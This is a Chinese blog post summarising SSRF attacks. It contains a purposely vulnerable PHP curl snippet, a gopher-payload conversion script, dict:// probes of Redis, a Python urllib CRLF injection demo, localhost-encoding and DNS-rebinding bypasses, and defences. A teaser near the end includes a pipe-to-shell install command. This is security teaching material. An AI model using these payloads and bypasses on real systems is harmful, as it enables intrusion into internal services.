SSRF总结

最新推荐文章于 2022-11-29 08:58:35 发布
最新推荐文章于 2022-11-29 08:58:35 发布
阅读量627 收藏 3
点赞数
分类专栏: Web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43936524/article/details/115208814
版权

文章目录

SSRF概述

SSRF是Server-side Request Forge的缩写,即服务端请求伪造。这个漏洞最大的特点是改变了大多数漏洞恶意请求从客户端发出的情况。通过利用具有SSRF漏洞的服务端向其他服务器获取数据这一功能,将恶意数据以SSRF服务器作为代理发出,进而攻击本地或者远程的目标。
SSRF的形成大多是因为服务端没有对目标地址做过滤和限制。

SSRF危害

  1. 信息收集
    对外网,以及服务器所在内网进行端口扫描,获得banner等信息
    对内网的Web资产进行指纹识别,获得企业内部的资产信息
  2. 攻击服务
    攻击运行在内网和服务器上的redis,memcache等服务
    对内网的web服务进行攻击,如SQL注入,文件上传,储存型XSS等通过http请求就可构造的攻击
  3. 获取文件
    通过file协议对服务器本地文件进行读取
  4. 命令执行
    如果业务本身就存在与远程节点的连接管理功能(如对服务器的连接管理),可能存在拼接指令造成rce

SSRF利用方式

SSRF相关协议利用

协议名利用方式
file如果SSRF有回显,可利用file协议去读取任意文件的内容
http/https探测内网ip存活,Web资产的信息
gophergopher支持发出GET、POST请求。可以先截获get请求包和post请求包,再构造成符合gopher协议的请求。gopher协议是ssrf利用中一个最强大的协议(俗称万能协议)。可用于反弹shell
dict泄露安装软件版本信息,查看端口,操作内网redis服务等

接下来以一段有缺陷的PHP代码为例探究各个协议的利用以及危害。

function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}
$url = $_GET['url'];
curl($url);

file(读取内网文件)

读取内网服务器的文件

http/https(扫描内网存活主机)

一般是先想办法得到目标主机的网络配置信息,如读取/etc/hosts、/proc/net/arp、/proc/net/fib_trie等文件,从而获得目标主机的内网网段并进行爆破。
内网IP网段:

  • C类:192.168.0.0 - 192.168.255.255
  • B类:172.16.0.0 - 172.31.255.255
  • A类:10.0.0.0 - 10.255.255.255

dict(扫描内网端口,攻击服务)

可以通过dict协议根据响应时间和内容去扫描内网开放端口以及端口上运行的服务信息

ssrf.php?url=dict://192.168.52.131:6379      // redis
ssrf.php?url=dict://192.168.52.131:80        // http
ssrf.php?url=dict://192.168.52.130:22        // ssh

gopher(对多种服务进行攻击)

Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用TCP 70端口。但在WWW出现后,Gopher失去了昔日的辉煌。

gopher协议格式:URL: gopher://<host>:<port>/<gopher-path>_后接TCP数据流
使用gopher发送http请求的方法:

  1. 发送并抓取http请求包
  2. 将%0a改为%0d%0a
  3. 改为符合gopher协议的形式
    测试页面:
<?php echo 'Hello World'?>

拦截请求:(保留必要字段,GET请求只需要保存Host即可)

GET /echo.php HTTP/1.1
Host: 192.168.1.187

请求转换脚本

import urllib.parse

raw_request = """
GET /echo.php HTTP/1.1
Host: 192.168.1.187
"""

tmp = urllib.parse.quote(raw_request)
res = tmp.replace('%0A','%0D%0A')
result = 'gopher://192.168.1.187:80/' + '_' + res
print(result)

转换后的gopher协议字段

gopher://192.168.1.187:80/_%0D%0AGET%20/echo.php%20HTTP/1.1%0D%0AHost%3A%20192.168.1.187%0D%0A

通过子网另一台电脑访问此路径

kit@ubuntu:~/Desktop$ curl gopher://192.168.1.187:80/_%0D%0AGET%20/echo.php%20HTTP/1.1%0D%0AHost%3A%20192.168.1.187%0D%0A
HTTP/1.1 200 OK
Date: Fri, 26 Mar 2021 06:57:35 GMT
Server: Apache/2.4.39 (Win64) OpenSSL/1.1.1b mod_fcgid/2.3.9a mod_log_rotate/1.02
X-Powered-By: PHP/7.3.4
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

b
Hello World
0

可以看出请求成功,正常访问到了内网的服务
因为攻击redis等服务需要换行执行指令,而gopher协议就可以构造换行的payload进行攻击。这部分内容在下文中详细描述。

SSRF中各类编程语言的限制

php

php中常出现SSRF的函数又curl和get_file_content。
curl支持http、https、ftp、gopher、telnet、dict、file 和 ldap 等协议,其中我们可以利用gopher和dict来攻击内网服务。
假设服务器端开启了redis服务。则可以利用dict构造攻击。
首先把带有缺陷的ssrf.php部署在内网的web服务器中,ip为192.168.83.131。并开启redis服务,本地连接redis设置为公钥连接不需要输入密码。
访问http://192.168.83.131/ssrf.php?url=dict://127.0.0.1:6379/set%20x%20payload
查看redis,发现成功创建key
在这里插入图片描述
注意事项:
curl_exec()默认不跟踪跳转
curl/libcurl 7.43上gopher协议存在bug(截断),7.45以上无此bug
file_get_contents的gopher协议不能 UrlEncode
file_get_contents关于Gopher的302跳转有bug,导致利用失败
file_get_contents() 支持php://input协议

python

python中常见的函数有urllib和request。但urllib不支持gopher和dict协议,所以从协议限制来看ssrf在服务端语言为python时利用的范围不大。但配合CRLF漏洞就可以通过换行来进行对redis等服务的攻击。

urllib曾爆出CVE-2019-9740、CVE-2019-9947两个漏洞,这两个漏洞都是urllib(urllib2)的CRLF漏洞,只是触发点不一样,其影响范围都在urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3之间,目前大部分服务器的python2版本都在2.7.10以下,python3都在3.6.x,这两个CRLF漏洞的影响力就非常可观了。

漏洞分析文章:CVE-2019-9740 Python urllib CRLF injection vulnerability 浅析
环境:python 3.6

import urllib.request
import urllib.error

if __name__ == '__main__':
    host = "192.168.1.101:7777?a=1 HTTP/1.1\r\nCRLF-injection: test\r\nTEST: 123"
    # host为可控数据
    url = "http://" + host + ":8080/test/?test=a"

    try:
        info = urllib.request.urlopen(url).info()
        print(info)

    except urllib.error.URLError as e:
        print(e)

-------------------------------------------------
kit@ubuntu:~$ nc -lvvp 7777
Listening on [0.0.0.0] (family 0, port 7777)
Connection from 192.168.1.105 1030 received!
GET /?a=1 HTTP/1.1
CRLF-injection: test
TEST: 123:8080/test/?test=a HTTP/1.1
Accept-Encoding: identity
Host: 192.168.1.101:7777
User-Agent: Python-urllib/3.6
Connection: close

请求包内容
在这里插入图片描述
当CRLF遇到SSRF就可以攻击redis之类的服务。

java

java中常见请求类URLConnection,HttpClient只支持下图所示协议,所以在内网探测和读取敏感信息两个攻击点可以利用http和file协议。但无法攻击redis等内网服务。
在这里插入图片描述
但在曾经爆出的weblogic漏洞则可以用来攻击内网服务,原因是weblogic自己实现了一套socket,没有使用常见请求类,而发起请求的函数又没有对域名进行限制,与上文所说的python类似,同样存在CRLF漏洞,两个漏洞结合起来可达到攻击内网服务的作用。
漏洞复现详情https://blog.csdn.net/qq_43936524/article/details/117599954

SSRF修复方案

针对上文所说这几种协议的利用不难总结出SSRF的防御机制。

  1. 端口过滤
    既然通过SSRF常被用来爆破内网中开放的端口和服务,那么就可以在后端限制访问的端口仅为Web端口
  2. IP过滤
    通过端口限制杜绝了攻击者攻击其他服务的请求,而通过对IP的限制可以杜绝访问所有内网的IP
  3. 协议过滤
    限制访问的协议仅为http/https
  4. 去除回显
    过滤请求的回显信息

SSRF绕过方式

http基本认证

利用形如www.baidu.com@www.bing.com会跳转到bing的特性绕过针对链接必须包含特定网址的防御机制。

30x跳转

  • 短网址
    有些网址提供短地址生成服务,访问短地址时会跳转到原有地址。
    在这里插入图片描述

  • 特殊的服务
    互联网上有一些服务如http://xip.io,http://nip.io,http://sslip.io 。每次访问该域名总会自动跳转至子域名的地址,如http://127.0.0.1.xip.io/会自动跳转到127.0.0.1。

url解析问题

127.0.0.1的多种形式

# liunx
http://0/ 
http://[0:0:0:0:0:ffff:127.0.0.1]/    
http://[::]:80/  
http://0.0.0.0/
# windows
http://localhost/          
http://127。0。0。1/       
http://①②⑦.⓪.⓪.①
http://127.1/
http://127.00000.00000.001/ # 与0的数量无关

dns rebinding

dns请求服务器会以TTL为时间周期缓存域名以及对应的IP绑定关系,在TTL时间周期内不会再向上级dns服务器查询,直接返回缓存中的结果。在缓存时间结束后会删除绑定记录。

所以依靠缓存时间的特性,从服务端的角度来看会对用户输入的url进行检查和访问两个流程。当检查域名时会进行一次DNS解析,而第二次请求时如果缓存的周期已经结束则会再次进行DNS解析。
所以我们可以操纵两次解析的结果使第一次解析的结果为合法IP而请求域名时再次解析为恶意的地址。
实现方式一种是自己搭建dns服务器,也可以从https://lock.cmpxchg8b.com/rebinder.html获得一个测试的域名。测试的域名解析的ip会在两个之间指定ip之间产生。所以需要不断尝试以达到第一次解析为符合条件ip地址,而第二次为内网ip。

When TLS Hacks You

2020年black hat(us)中有一个议题利用TLS + IP rebinding + SSRF来攻击常见服务。首先考虑正常情况下,由于http协议的局限性,只有与CRLF漏洞配合才能在http报文中注入payload进行攻击。而这种新型的攻击方式不再依赖请求中注入payload,而采用https中的会话恢复机制sessionID来储存payload,从而进行攻击。

客户端和服务器TLS握手时,需要协商会话密钥,数字签名验证,消息验证码MAC等。每次重新握手都会消耗大量的时间。
于是TLS/SSL提供了会话恢复的方式,允许连接结束时,客户端可以通过上次连接储存的Session ID或Session ticket来直接恢复对话(服务器储存会话信息并以SessionID标识)。
而session ticket可提供65k的空间,足以容纳payload。

整体流程

  1. 客户端访问攻击者的域名
  2. dns服务器返回一个TTL=0的解析记录,ip地址为攻击者服务器
  3. 攻击者服务器返回一个恶意构造的sessionID储存在客户端,并返回一个跳转请求
  4. 客户端接收到跳转请求,此时dns记录已经过期,再次发起dns解析
  5. 第二次解析结果为内网的ip地址,客户端发起请求并附加上恶意的sessionID
  6. sessionID目标内网主机上执行

参考文章:
SSRF安全指北
CTF SSRF从0到1

kit_1
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF学习详解与实践
不想当脚本小子的脚本小子
01-24 903
原理:SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。注释:除了http/https等方式可以造成ssrf,类
SSRF漏洞原理攻击与防御(超详细总结)
最新发布
shandongjiushen的博客
04-23 1278
漏洞挖掘必看
ssrf总结
wsitcj的博客
04-15 198
基本常识 一 先来了解一下概念吧: 也就是说:能够对外发起请求的web应用都可能存在ssrf漏洞! 那么,要怎么判断确实存在漏洞呢 回显 当输入一个url返回一个对应的页面,例如输入www.baidu.com 会返回百度页面 响应时长 当访问一个页面上面的圈圈一直在转动的话,例如国内访问 谷歌 DNS请求 利用类似DNSlog的网站 利用 nc 监听 在本地设置一个监听端口 ,用目标来访问 二 相关函数: file_get_contents: 例如: 看是否存在漏洞,看他是否能访问内网
SSRF知识点总结
千寻的博客
02-09 599
文章目录第一章第一节 SSRF 概述第二节 SSRF 危害第二章SSRF 常见代码实现第三章 SSRF利用第一节 访问正常文件第二节 端口扫描第三节 读取系统本地文件第四节 内网Web 应用指纹识别第五节 攻击内网应用第四章 SSRF 的防御第一节 限制协议第二节 限制IP第三节 限制端口第四节 过滤返回信息第五节 统一错误信息 第一章 第一节 SSRF 概述 互联网上的很多Web 应用提供...
SSRF小结
Zlirving_的博客
05-25 479
概述 SSRF(服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。 (正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 原因 由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 漏洞出现点 分享(通过URL地址分享网页内容) 转码服务 在线翻译 网络抓取 邮件系统 图片加载与下载(通过URL地址加载或下载
SSRF漏洞复习总结
Jack001011的博客
08-06 392
SSRF漏洞复习总结 渗透测试 作者: 管理员 一.SSRF简介 SSRF(Server-Side Request Forgery),服务器端请求伪造,利用漏洞伪造服务器端发起请求,从而突破客户端获取不到数据限制。 二.漏洞的利用 1.端口扫描 2.攻击运行在内网或本地的有漏洞程序(比如溢出); 3.可以对内网Web应用进行指纹识别,原理是通过请求默认的文件得到特定的指纹 4.使用网络协议读取本地文件 5.DoS攻击(请求大文件,始终保持连接keep-alive always) 附常见攻击协议 1)Goph
SSRFTest:SSRF测试工具
05-04
欢迎来到SSRFTest 安装 克隆仓库 生成一个随机的64字节ASCII字符串(我通常只运行import random; ''.join('x' % random.randrange(256) for i in xrange(32))在Python解释器中,对import random; ''.join('x' % random.randrange(256) for i in xrange(32)) )) 将该字符串放入app.secret_key app.secret_key = key = 'SECRET HERE'行上的app.secret_key = key = 'SECRET HERE' (可选)在docker-compose.yml和model.py中更改数据库密码-默认为dbpassword 。 这没有暴露在外面,所以基本上无关紧要 搜索ssrftest.c
SSRF漏洞小结
weixin_44300286的博客
08-17 1148
0x01、SSRF简介 SSRF (server-site request forery,服务端请求伪造)是一种构造请求, 由服务端发起请求的安全漏洞。一般情况下,攻击者无法直接访问到内网资源,但如果服务器存在SSRF漏洞,攻击者就可以利用SSRF攻击访问外网无法访问的内网资源。 SSRF漏洞形成的原因是服务端提供了从其他服务器回去数据的功能,但没有对内网目标地址做过滤与限制。 0x02、漏洞危害 1、 可以对外网、内网、本地进行端口扫描, 获取一些服务的banner信息 2、 攻击运行在内网或本地的应
CSRF攻击分类
blrk
05-02 1486
CSRF是伪造客户端请求的一种攻击,CSRF的英文全称是Cross Site Request Forgery,字面上的意思是跨站点伪造请求。这种攻击方式是国外的安全人员于2000年提出,国内直到06年初才被关注,早期我们团队的剑心使用过CSRF攻击实现了DVBBS后台的SQL注射,同时网上也出现过动易后台管理员添加的CSRF漏洞等,08年CSRF攻击方式开始在BLOG、SNS等大型社区类网站的脚本
SSRF类型总结
qq_45655564的博客
08-20 216
应对一些过滤 127.0.0.1可以由以下代替 127.0.1 、127.1、 127。0.0.1或者转成16进制 2进制 curl可以用句号。代替点. 修改域名的解析 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $x=parse_url($url); if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_match('/localhos
细说SSRF
LainWith的博客
08-24 2769
目录什么是SSRF形成原因容易出现SSRF的地方SSRF的危害脑图函数file_get_contents()fsockopen()curl_exec()协议漏洞检测常用绕过方式限制为http://www.xxx.com 域名时(利用@)限制请求IP不为内网地址限制请求只为http协议利用[::]利用句号利用特殊地址利用协议利用上传利用Enclosed alphanumerics靶机演示CTFhub内网访问伪协议读取文件端口扫描其他SSRF打穿内网SSRF-lab漏洞防御参考 什么是SSRF 服务器端请求伪
CSRF及SSRF详解
剁椒鱼头没剁椒的博客
11-29 4741
  CSRF(Cross-site Request Forgery,跨站请求伪造)是一种针对网站的恶意利用。   CSRF攻击可以利用用户已经登陆或已经授权的状态,伪造合法用户发出请求给受信任的网点,从而实现在未授权的情况下执行一些特权操作。  1)首先用户登录网站,并且生产本地的cookie。   2)用户在未登陆出网站的时候,访问攻击者构建的恶意网站。   当然若你关闭网站去访问恶意网站就会避免该问题,但不是绝对的,相信在日常使用中都会存在浏览器同时打开多个页面,很少说有人去访问一个网站的时候把另外的网
SSRF详解(包含多种SSRF攻击)
Zyu0
11-28 5224
服务器端请求伪造(也称为 SSRF)是一种 Web 安全漏洞,允许攻击者诱导服务器端应用程序向非预期位置发出请求。在典型的 SSRF 攻击中,攻击者可能会导致服务器连接到组织基础设施内的仅供内部使用的服务。在其他情况下,他们可能会强制服务器连接到任意外部系统,从而可能泄露授权凭证等敏感数据。如果攻击者能够将url参数更改为localhost,这可能允许他们查看服务器上托管的本地资源,从而使其容易受到服务器端请求伪造的攻击。滥用易受攻击的服务器与其他系统之间的信任关系绕过 IP 白名单。
SSRF最全总结(协议,绕过)
热门推荐
weixin_50464560的博客
01-13 1万+
https://www.anquanke.com/post/id/262430#h3-46   SSRF-Labs配置 有些初学者喜欢用这个靶场,讲下怎么搭建 我用的是Ubuntu18;docker和docker-compose配置可以参考vulhub官网的配置;下面是谷歌搜的 $ curl -sSL https://get.docker.com/ | sh #脚本安装docker $ apt install docker-compose #安装docker compose Basic关和

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值